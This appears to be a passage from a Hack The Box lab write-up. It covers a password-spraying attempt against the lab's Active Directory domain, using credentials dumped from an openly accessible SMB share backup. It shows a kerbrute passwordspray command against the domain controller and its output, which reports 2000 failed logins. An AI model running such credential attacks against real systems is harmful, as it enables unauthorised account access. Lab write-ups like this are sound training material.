Password Spraying Attack
The backup archive found in one of the target SMB shares, accessible by anyone, holds a vital set of files that contains the entire domain credentials. While those files appeared to be outdated from the testing as only a single domain user is validated, hashdump result shows a few CLEARTEXT credentials
┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ kerbrute passwordspray --dc apt.htb.local -d HTB.LOCAL ./users.txt 'Password123!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 10/22/23 - Ronnie Flathers @ropnop
2023/10/22 19:16:37 > Using KDC(s):
2023/10/22 19:16:37 > apt.htb.local:88
2023/10/22 19:34:44 > Done! Tested 2000 logins (0 successes) in 1086.574 secondsPassword Spraying attack failed
There is no domain user that matches with the CLEARTEXT password; Password123!